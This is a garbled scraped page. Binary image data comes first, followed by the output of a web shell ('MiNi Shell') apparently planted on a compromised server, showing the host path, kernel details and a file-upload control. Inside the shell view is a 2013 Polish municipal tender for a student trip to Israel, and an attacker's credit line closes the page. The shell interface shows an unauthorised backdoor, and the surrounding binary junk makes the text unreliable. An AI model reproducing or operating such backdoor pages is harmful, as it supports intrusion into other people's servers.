JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130805/155211-N-2013.html

<p class="kh_header"><b>Sulechów: Zorganizowanie transportu i pobytu grupy uczniów, opiekunów oraz 
przedstawicieli Gminy Sulechów w Izraelu w związku z realizacją współpracy ponadnarodowej w ramach projektu Widzę 
i rozumiem dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 155211 - 2013; data zamieszczenia: 05.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulechów , Plac Ratuszowy 6, 66-100 Sulechów, woj. lubuskie, tel. 068 3851120, faks 068 3854686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie transportu i pobytu grupy uczniów, opiekunów oraz 
przedstawicieli Gminy Sulechów w Izraelu w związku z realizacją współpracy ponadnarodowej w ramach projektu Widzę 
i rozumiem dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja usługi polegającej na zorganizowaniu transportu do i z Izraela oraz pobytu 18-osobowej grupy obywateli RP w Izraelu w dniach od 15.12.2013 r. do 21.12.2013 r., w związku z realizacją współpracy ponadnarodowej w ramach projektu Widzę i rozumiem prowadzanego w Gimnazjum nr 2 w Sulechowie, dofinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013.
2. Grupa będzie składać się z 8 osób dorosłych oraz z 10 uczniów gimnazjum (rocznik 1999 oraz 1998). Imienna lista uczestników przekazana zostanie Wykonawcy 30 dni przed rozpoczęciem realizacji usługi.
3. Wykonawca musi zapewnić:
a) 18-osobowej grupie wraz z bagażami transport autokarem z Sulechowa (woj. lubuskie) w dniu 15.12.2013 r. na lotnisko oraz powrót w dniu 21.12.2013 r. z lotniska do Sulechowa (woj. lubuskie).
b) autokar lub bus w Izraelu (dla grupy 18 osób) zapewniający:
dowóz w dniu 15.12.2013r. z lotniska do miejsca zakwaterowania i z powrotem w dniu 21.12.2013 r. z miejsca zakwaterowania na lotnisko oraz przewozy w dniach 16 - 20 grudnia 2013 r. na terenie Izraela z miejsca zakwaterowania na miejsce zajęć szkolnych i projektowych w Home of Education and Sciences - High School of Jaljulya  oraz zajęć projektowych kulturowych na terenie Izraela. 
Łącznie przewiduje się około 400 km przejazdów, w tym 2 dni to wyjazdy całodzienne, a w pozostałe 3 dni dowozy na miejsce zajęć i spotkań oraz odwozy do miejsca zakwaterowania. Pojazdy zarówno do przejazdów z i na lotniska oraz do przewozów w Izraelu muszą posiadać sprawną klimatyzację oraz spełniać normy ochrony środowiska i bezpieczeństwa ruchu.
c) przelot 18-osobowej grupie wraz z bagażami bez przesiadek:
-do Izraela z lotniska znajdującego się w odległości nie większej niż 250 km od Sulechowa (woj. lubuskie), 
-z Izraela na lotnisko znajdujące się w odległości nie większej niż 250 km od Sulechowa (woj. lubuskie), 
przy czym cała 18-osobowa grupa musi lecieć jednym samolotem, zarówno do Izraela jak i z powrotem,
d) możliwość przelotu dla każdej z osób z co najmniej 1 sztuką bagażu głównego, którego waga może przekroczyć 20 kg,
e) możliwość przelotu dla każdej z osób z co najmniej 1 sztuką bagażu podręcznego (wymiary i waga zgodnie z warunkami linii lotniczej),
f) przylot do Izraela w dniu 15.12.3013 r. najpóźniej do godziny 16:00 czasu miejscowego.
g) lądowanie na lotnisku w odległości nie większej niż 250 km od Sulechowa (woj. lubuskie) w dniu 21.12.2013 r.  najpóźniej do godziny 21:00 czasu miejscowego. 
h) zakwaterowanie dla całej 18-osobowej grupy w jednym miejscu, w dniach od 15.12.2013 r. do 21.12.2013 r. (6 noclegów) w odległości do 30 kilometrów od miejsca zajęć szkolnych Home of Education and Sciences - High School of Jaljulya w Izraelu, przy czym grupa musi być zakwaterowana w 2 pokojach dwuosobowych o podwyższonym standardzie, 2 pokojach jednoosobowych o podwyższonym standardzie, 3 pokojach dwuosobowych o średnim stan-dardzie i 2 pokojach trzyosobowych o średnim standardzie; 
Uwaga! 
Przez podwyższony standard rozumie się pokój posiadający minimum następujące wyposażenie:
- łazienkę z prysznicem/wanną, 
- łóżka jednoosobowe,
- kącik wypoczynkowy,
- bezpłatny dostęp do Internetu,
- bezpłatny telewizor,
- bezpłatną lodówkę,
- bezpłatny dostęp do żelazka
- komplet ręczników.
Przez średni standard rozumie się pokój posiadający minimum następujące wyposażenie:
- łazienkę z prysznicem/wanną,
- łóżka jednoosobowe, 
- bezpłatny telewizor,
- bezpłatny dostęp do Internetu,
- komplet ręczników.
i) całodzienne wyżywienie - 3 posiłki dziennie (śniadanie, obiad, kolacja, każdy posiłek z na-pojami zimnymi i ciepłymi) przy czym śniadania i kolacje zapewnione muszą być w miejscu zakwaterowania. Obiady mogą być zapewnione w miejscu zakwaterowania lub innym miejscu dostosowanym do planu zorganizowanych zajęć. W dniu przylotu - 15.12.2013 r. Wykonawca musi zapewnić obiad i kolację wraz z napojami zimnymi i ciepłymi. W dniu wylotu - 21.12.1013 r. Wykonawca musi zapewnić śniadanie wraz z napojami zimnymi i ciepłymi oraz suchy prowiant na drogę.
j) ubezpieczenie na cały czas wyjazdu dla każdego uczestnika wyjazdu tj. ubezpieczenie od następstw nieszczęśliwych wypadków - NNW, kosztów leczenia - KL, oraz ubezpieczenie bagażu w czasie transportu autobusem oraz samolotem.
4. Wykonawca musi dostarczyć Zamawiającemu w formie papierowej na adres:
Gmina Sulechów, 66-100 Sulechów, Plac Ratuszowy 6 lub elektronicznie na adres os@sulechow.pl, najpóźniej na 7 dni przed terminem rozpoczęcia wyjazdu:
a) polisy ubezpieczeniowe, o których mowa w ust.1 pkt 3 lit. j),
b) bilety lotnicze.
W tym samym terminie Wykonawca zobowiązany jest powiadomić Zamawiającego o miejscu pobytu uczestników wyjazdu w Izraelu (nazwa hotelu, adres, nr telefonu).
5. W cenie muszą być zawarte wszelkie opłaty wizowe, opłaty lotniskowe oraz wszystkie inne nie-zbędne dokumenty i opłaty wymagane w celu wykonania przedmiotu zamówienia.
6. Dopuszcza się składanie ofert równoważnych.
7. Zamówienie może być realizowane do wysokości środków finansowych przewidzianych w 
budżecie Zamawiającego na realizację tego zadania.
8. Zamawiający nie dopuszcza składania ofert wariantowych i/lub częściowych.
9. Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
10. Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się zrealizowaniem w okresie ostatnich 3 lat, minimum 2 zamówień o charakterze i złożoności porównywalnej z zakresem niniejszego zamówienia tj. zorganizowaniem grupowego wyjazdu zagranicznego, w którym zapewnił grupie transport lotniczy oraz za-kwaterowanie i wyżywienie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać opłaconą polisę (z dowodem opłaty), a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie pro-wadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 150.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.1.	Formularz oferty na załączniku nr 1.
3.2.	Dane Wykonawcy na załączniku nr 1a.
3.3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
3.4.	W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
a)	zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełno-mocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo repre-zentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, pełnomocnictwo to musi być podpisane przez wszystkich Wykonawców,
b)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy, o których mowa w pkt III.4.2).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Umowa może być zmieniona w stosunku do treści złożonej przez Wykonawcę oferty w następujących przypadkach:
1)	w razie zaistnienia siły wyższej, uniemożliwiającej wykonanie umowy zgodnie z jej wa-runkami, pod warunkiem uzyskania zgody Zamawiającego,
2)	w razie zmiany miejsca noclegowego z istotnych powodów (np. remont, zamknięcie hote-lu), pod warunkiem, że nie będzie to prowadziło do pogorszenia standardu świadczeń Wykonawcy w stosunku do określonych w umowie, SIWZ oraz ofercie Wykonawcy, pod warunkiem uzyskania zgody Zamawiającego,
3)	w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np. gdy obniży to koszty usługi), pod warunkiem uzyskania zgody Zamawiającego, 
4)	w innych uzasadnionych przypadkach, za zgodą Zamawiającego.
2.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej, po rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sulechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Sulechów
ul. Plac Ratuszowy 6
66-100 Sulechów
pok. 119b Wydział BZ.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2013 godzina 10:30, miejsce: Gmina Sulechów
ul. Plac Ratuszowy 6
66-100 Sulechów
Biuro Obsługi Interesanta pok. 002.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
Człowiek - Najlepsza inwestycja.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com